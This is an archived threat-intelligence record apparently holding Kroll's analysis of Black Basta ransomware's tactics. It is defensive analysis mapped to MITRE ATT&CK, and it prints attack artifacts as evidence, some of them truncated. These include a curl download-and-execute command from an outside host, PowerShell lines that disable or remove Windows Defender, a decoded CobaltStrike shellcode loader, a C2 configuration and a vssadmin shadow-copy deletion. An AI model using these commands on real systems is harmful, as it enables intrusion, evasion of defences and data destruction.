{
	"id": "b2dc3a3e-2a7f-4702-bf41-b98c83ef6b57",
	"created_at": "2026-04-06T00:16:41.906773Z",
	"updated_at": "2026-04-10T03:20:52.78593Z",
	"deleted_at": null,
	"sha1_hash": "4b3eddafe4361bc33925007f4cb5dac8fe9adb6b",
	"title": "Black Basta - Technical Analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2317390,
	"plain_text": "Black Basta - Technical Analysis\r\nPublished: 2023-01-23 · Archived: 2026-04-05 22:34:05 UTC\r\nKey Takeaways\r\nKroll has identified both unique and common tactics, techniques and procedures (TTP) used by Black\r\nBasta to conduct double extortion ransomware campaigns. Vulnerable organizations are advised to\r\nproactively apply appropriate countermeasures to reduce their risk exposure.\r\nAttack objectives include disabling anti-virus and endpoint detection and response tools, exfiltrating\r\nsensitive data and encrypting files with the “.basta” extension.\r\nInitial access is often acquired via malicious links in spearphishing emails. Common tools used by Black\r\nBasta are Qakbot, SystemBC, Mimikatz, CobaltStrike and Rclone. \r\nSummary\r\nIn recent months, news outlets have reported a surge in double extortion ransomware attacks by Black Basta, a\r\nnotorious ransomware-as-a-service (RaaS) threat group first identified in early 2022. The actor is sophisticated,\r\noften utilizing a unique set of tactics, techniques and procedures (TTPs) to gain a foothold, spread laterally,\r\nexfiltrate data and drop ransomware. However, Kroll has observed Black Basta sometimes utilizing similar TTPs\r\nacross multiple incidents. Therefore, it's prudent for potential victims to educate themselves and adopt proactive\r\ncountermeasures to reduce their risk exposure.\r\nBlack Basta often gains initial access via a link to a malicious document delivered by email in the form of a\r\npassword-protected zip file. Once extracted, the document installs the Qakbot banking trojan to establish backdoor\r\naccess and deploy SystemBC, which establishes an encrypted connection to a C2 server. Often, Black Basta will\r\nacquire network persistence via legitimate remote access software tools.\r\nNext, the post-exploitation framework known as CobaltStrike is installed for reconnaissance and deploying\r\nadditional tooling across the network. Unlike most threat actors, Black Basta utilizes numerous tool deployment\r\nand remote access methods.\r\nBlack Basta often attempts to disable security tooling via premade scripts that interact with the registry. Kroll has\r\nalso observed attempts to remove or disable endpoint detection and response systems to conceal the deployment\r\nof tools such as Mimikatz and CobaltStrike.\r\nOne of Black Basta’s primary objectives is to exfiltrate data. Most often, this is achieved with Rclone, which can\r\nfilter for specific files before copying them to a cloud service. Once exfiltration is complete, the ransomware\r\nbinary is executed to encrypt files with the “.basta” extension, delete volume shadow copies, and display a ransom\r\nnote named readme.txt on infected devices.\r\nhttps://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis\r\nPage 1 of 9\n\nBlack Basta loiter time is typically two to three days. However, an extended hibernation time sometimes occurs\r\nafter the initial Qakbot infection. This may indicate that initial access is being sold to associated threat actors.\r\nTactics, Techniques and Procedures\r\n \r\nInitial Exploit\r\nKroll has identified that the most common mode of initial access used by Black Basta is by sending a phishing\r\nemail that contains a link to a zip file for the victim to download. The email also often provides a password to the\r\nzip file to increase the perceived “authenticity” of the email. The email addresses used by Black Basta vary\r\nbetween cases.\r\nRe: Victim - Multiple POs attached\r\nGreetings!\r\nPlease check your docs as one doc available through the link lower:\r\nhxxps://sciencesformation[.]com/nsst/ditpciattusie\r\nFile password: U876\r\nWe have a price discrepancy on PO# A123456\r\nITEM: F799-CL - $168.46\r\nFigure 1 - Anonymized Email Example\r\nThis initial access method is true across a number of cases worked by Kroll. It is common for the zip file to have\r\nbeen accessed on several user endpoints. It is likely that the phishing emails are targeted and suggests some initial\r\nhttps://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis\r\nPage 2 of 9\n\nreconnaissance conducted by the threat actors. The link in Figure 1 drops a zip file within the user’s download\r\nfolder. Once opened, a link (.lnk) file masquerades as a document, for example, filename.Doc.lnk. This link file\r\nthen deploys Qakbot onto the endpoint.\r\nMITRE ATT\u0026CK: T1566.002: Spearphishing Link\r\nMITRE ATT\u0026CK: T1204.002: User Execution: Malicious File\r\nInternal Scouting\r\nOne of the first tools deployed by Black Basta is CobaltStrike, which furnishes such post-exploitation capabilities\r\nas network and port scanning. Further information on CobaltStrike is detailed later in this report.\r\nMITRE ATT\u0026CK: T1049: System Network Connections Discovery\r\nToolkit Deployment\r\nAfter the link file is executed, a curl command is executed to download a Javascript file, and this is then executed\r\nby wscript.exe to compile the Qakbot binary. It also contacts the command-and-control servers to inform the threat\r\nactor that it is alive.\r\n/q /c echo 'zA1' \u0026\u0026 MD \"%APPDATA%\\Iu\\MlSL\" \u0026\u0026 curl.exe --output %APPDATA%\\Iu\\MlSL\\FEqwhs8j.GE.v6E.js hxxps://pa\r\nFigure 2 – Lnk File Contents: Qakbot Initial Execution\r\nMITRE ATT\u0026CK: T1204.002: User Execution: Malicious File\r\nMITRE ATT\u0026CK: T1059.007: JavaScript\r\nTypically, a dll file is registered by RegSvr32 and a scheduled task is created. Qakbot is utilized to provide\r\nbackdoor access and to deliver the next stage of tooling. Typically, persistence is achieved by the creation of\r\nautorun entries and scheduled tasks. This allows threat actor to maintain a foothold within the network with\r\nbackdoor access.\r\nMITRE ATT\u0026CK: T1059.007: JavaScript\r\nBatch scripts are often deployed to inhibit detection by anti-virus or other security software. The script names\r\nvary; however, the content appears to be similar and generally operates in a similar way by removing Windows\r\nDefender in stages. Other scripts to remove specific anti-virus have also been identified including a script to\r\nestablish a scheduled task to prevent anti-virus being reenabled.\r\npowershell -ExecutionPolicy Bypass -command “New-ItemProperty -Path ‘HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\r\nFigure 3 – Batch Script 1: Disable Windows Defender\r\npowershell -ExecutionPolicy Bypass -command “Set-MpPreference -DisableRealtimeMonitoring 1”\r\nhttps://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis\r\nPage 3 of 9\n\nFigure 4 – Batch Script 2: Disable Windows Defender Monitoring\r\npowershell -ExecutionPolicy Bypass Uninstall-WindowsFeature -Name Windows-Defender\r\nFigure 5 – Batch Script 3: Remove Windows Defender\r\nKroll has also seen attempts to disable endpoint detection and response (EDR) tooling by utilizing the tool named\r\nBackstab. To achieve this, they use a legitimate copy of the process explorer driver within\r\nC:\\Windows\\system32\\drivers\\ . This driver is used to kill process handles of the EDR tools. The tool then checks\r\nthe registry for names of common EDR tools and disables user access control (UAC) before attempting to remove\r\nthose EDR tools.\r\nMITRE ATT\u0026CK: T1562.001: Disable or Modify Tools\r\nMITRE ATT\u0026CK: T1059: Command and Scripting Interpreter\r\nTo maintain control, Black Basta has been identified by Kroll as using multiple tools for command and control\r\n(C2). Common legitimate tools, including AnyDesk, AteraAgent and Splashtop, have been identified providing\r\nremote access.\r\nMITRE ATT\u0026CK: T1219: Remote Access Software\r\nKroll has identified that the remote access tool known as SystemBC is indicative of Black Basta cases. The tool is\r\npreconfigured with C2 domains and can also be utilized as a Tor proxy to provide a channel for the threat actor to\r\ndeploy scripts and other tools. Figure 6 details the Black Basta configuration of SystemBC in one case. The name\r\nof the file is often obfuscated with a random name such as gemoh.exe. SystemBC also creates a scheduled task to\r\nmaintain persistence, usually named the same as the binary itself within C:\\Windows\\Tasks\\.\r\n{\r\n \"HOST1\": \"restoreimagesinc[.]com\",\r\n \"HOST2\": \"restoreimagesinc[.]com\",\r\n \"PORT1\": \"443\",\r\n \"TOR\": \"\"\r\n}\r\nFigure 6 – SystemBC config\r\nMITRE ATT\u0026CK: T1090: Proxy\r\nEscalation\r\nIn a number of Black Basta cases, the threat actor successfully phished a local administrator account; however,\r\nMimikatz is also used to access these credentials via a cache. This is run on the domain controller once access is\r\ngained. Mimikatz is often renamed by Black Basta in a likely attempt to evade security solutions even after\r\ndisabling anti-virus solutions. Mimikatz is a common post-exploitation tool used to collect Windows credentials.\r\nIt is also used for collecting Kerberos tickets and is most commonly used to extract password hashes from LSA\r\nhttps://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis\r\nPage 4 of 9\n\ndumps and the security account managers database. The credentials are extracted and are then “cracked” to\r\nprovide a credential pair. Mimikatz also provides the ability to conduct “pass the hash” by extracting the NTLM\r\nhash and allowing the hash to be forwarded to gain access to other devices without the need to know the victim’s\r\npassword.\r\nMITRE ATT\u0026CK: T1003: OS Credential Dumping\r\nMITRE ATT\u0026CK: T1558: Steal or Forge Kerberos Tickets\r\nBlack Basta attempts to increase privileges with open-source tools such as nircmd.exe and nsudo.exe, which can\r\nallow execution at higher levels of privilege. These are often delivered via Qakbot or SystemBC.\r\nCobaltStrike provides capabilities to gain increased privileges such as SYSTEM-level execution and “pass the\r\nhash” capabilities. Kroll has identified on several Black Basta cases that server message block (SMB) remote\r\nservice execution is leveraged by pushing files from the domain controller (see Lateral Movement for more\r\ndetails). Pass the hash attempts have also been identified with Type 9 logins and corresponding commands passed\r\nvia a named pipe.\r\nMITRE ATT\u0026CK: T1558: Steal or Forge Kerberos Tickets\r\nLateral Movement\r\nBlack Basta has been found by Kroll to be using multiple tools for lateral movement. Common legitimate tools\r\nsuch as AnyDesk, AteraAgent and Splashtop have been identified as not only providing remote access but also\r\nallowing the threat actor to move laterally within the network. Remote desktop protocol (RDP) is regularly used\r\nwith the previously collected credentials.\r\nMITRE ATT\u0026CK: T1219: Remote Access Software\r\nMITRE ATT\u0026CK: T1021: Remote Services\r\nTypically, the post-exploitation framework known as CobaltStrike is installed as a service. This provides crucial\r\ncapabilities to the threat actor, including deploying tools and the ransomware binary across the network. This is\r\nusually achieved by a SMB Beacon. CobaltStrike is installed via Qakbot, and this is normally identified via\r\nservice creations with a seven (7) random alpha-numeric character name. A base64 encoded PowerShell command\r\nlaunched by the Command Specifier (%COMSPEC%) can be found within the service event data, as shown in\r\nFigure 7.\r\n%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEk\r\nFigure 7 – CobaltStrike Service Execution\r\nStandard base64 decoding of the encoded string, shown in Figure 7, details that further Gunzip compressed\r\nbase64 encoded strings are present.\r\n$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(\"H4sIAAAAAAAA/61WbXPauhL+HH6FPmTG9hQogTQNvZOZ8o45QAg\r\nhttps://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis\r\nPage 5 of 9\n\nFigure 8 – CobaltStrike Encoded Command\r\nA further base64 encoded blob can be extracted and decrypted with an XOR key of 35, as shown in Figures 9 and\r\n10.\r\nSet-StrictMode -Version 2\r\n$DoIt = @'\r\nfunction func_get_proc_address {\r\nParam ($var_module, $var_procedure)\r\n$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAsse\r\n$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropSer\r\nreturn $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.In\r\n}\r\nfunction func_get_delegate_type {\r\nParam (\r\n[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,\r\n[Parameter(Position = 1)] [Type] $var_return_type = [Void]\r\n)\r\n$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.Asse\r\n$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConve\r\n$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_\r\nreturn $var_type_builder.CreateType()\r\n}\r\n[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwu\r\nfor ($x = 0; $x -lt $var_code.Count; $x++) {\r\n$var_code[$x] = $var_code[$x] -bxor 35\r\n}\r\n$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel3\r\n$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)\r\n[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)\r\n$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_dele\r\n$var_runme.Invoke([IntPtr]::Zero)\r\n'@\r\nIf ([IntPtr]::size -eq 8) {\r\nstart-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job\r\n}\r\nelse {\r\nhttps://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis\r\nPage 6 of 9\n\nIEX $DoIt\r\n}\r\nFigure 9 – CobaltStrike Decoded Loader\r\nThe named pipe identified in Figure 9 shows the presence of SMB beacons. This allows infected machines to\r\ncommunicate with the threat actor-controlled device via an SMB channel.\r\nüè....`.å1Òd.R0.R..R..r(.·J\u00261ÿ1À¬\u003ca|., ÁÏ\r\n.ÇâðRW.R..B\u003c.Ð.@x.ÀtJ.ÐP.H..X .Óã\u003cI.4..Ö1ÿ1À¬ÁÏ\r\n.Ç8àuô.}ø;}$uâX.X$.Óf..K.X..Ó....Ð.D$$[[aYZQÿàX_Z..ë.]1Àj@h....hÿÿ..j.hX¤SåÿÕPé¨...Z1ÉQQh.°..h.°..j.j.j.RhEpßÔ\r\nFigure 10 – CobaltStrike 32bit ShellCode with SMB Beacon via a Named Pipe\r\nThe SMB remote service execution allows the threat actor to push tools and malicious files across the network at\r\nSYSTEM-level privileges. Typically, an administrator share, for example “$ADMIN”, is used to store the\r\nmalicious binary to then be executed from a domain controller. Detection of this activity can be identified within\r\nPowerShell logging.\r\nMITRE ATT\u0026CK: T1543.003: Create or Modify System Process: Windows Service\r\nMITRE ATT\u0026CK: T1509: Command and Scripting Interpreter\r\nMITRE ATT\u0026CK: T1572: Protocol Tunneling\r\nMITRE ATT\u0026CK: T1021.002: Remote Services: SMB/Windows Admin Shares\r\nMITRE ATT\u0026CK: T1071: Application Layer Protocol\r\nMission Execution\r\nOnce Black Basta has established themselves on the network, they look to identify files for exfiltration. Kroll has\r\nidentified that Rclone is Black Basta’s tool of choice for exfiltration, although WinSCP has also been identified.\r\nRclone provides the ability to upload data to a configured cloud storage provider. Detection of this can be\r\nachieved by investigating the system pagefile, system resource usage monitor (SRUM) and the UsnJrnl ($J).\r\nMITRE ATT\u0026CK: T1567.002: Exfiltration Over Web Service: Exfiltration to Cloud Storage\r\nAfter data exfiltration, the next stage is to encrypt endpoints with the Black Basta ransomware binary. The\r\nexecutable name varies between incidents; however, it often provides the same capabilities. The binary launches a\r\ncommand line to delete VSS shadow copies with vssadmin, as shown in Figure 11, before encrypting files and\r\ncreating the readme.txt file.\r\nC:\\Windows\\System32\\vssadmin.exe delete shadows /all /quiet\r\nFigure 11 – Shadow Copy Deletion by Black Basta Ransomware\r\nhttps://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis\r\nPage 7 of 9\n\nDeleting the volume of shadow copies helps prevent system recovery, providing further leverage for the threat\r\nactor to demand a ransom for decryption.\r\nMITRE ATT\u0026CK: T1490: Inhibit System Recovery\r\nYour data are stolen and encrypted\r\nThe data will be published on TOR website if you do not pay the ransom\r\nYou can contact us and decrypt one file for free on this TOR site\r\n(you should download and install TOR browser first https://torproject.org)\r\n\u003credacted tor link\u003e\r\nYour company id for log in: \u003credacted\u003e\r\nFigure 12 – Example readme.txt Black Basta Ransom Note\r\nFigure 12 details the standard Black Basta ransom note, which states that data has been exfiltrated. As mentioned\r\nearlier, while exfiltration is common, the encrypted file extensions may vary. Typically, files are appended with\r\n“.basta” but variations of this extensions have been identified. The ransomware binary also changes the wallpaper\r\nto the image shown in Figure 13. The binary places a .jpg\"text-align: center;\"\u003e\r\nhttps://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis\r\nPage 8 of 9\n\nFigure 13 – Desktop Wallpaper Configuration\r\nOnce encryption is complete the threat actor will likely leave the network. If the victim does not interact with the\r\nthreat actor, company information and a data listing will be added to the Black Basta leak site. A screenshot of the\r\nleak site can be found in Figure 14.\r\nFigure 14 – Black Basta Leak Site\r\nMITRE ATT\u0026CK: T1486: Data Encrypted for Impact\r\nSource: https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis\r\nhttps://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis"
	],
	"report_names": [
		"black-basta-technical-analysis"
	],
	"threat_actors": [],
	"ts_created_at": 1775434601,
	"ts_updated_at": 1775791252,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4b3eddafe4361bc33925007f4cb5dac8fe9adb6b.pdf",
		"text": "https://archive.orkl.eu/4b3eddafe4361bc33925007f4cb5dac8fe9adb6b.txt",
		"img": "https://archive.orkl.eu/4b3eddafe4361bc33925007f4cb5dac8fe9adb6b.jpg"
	}
}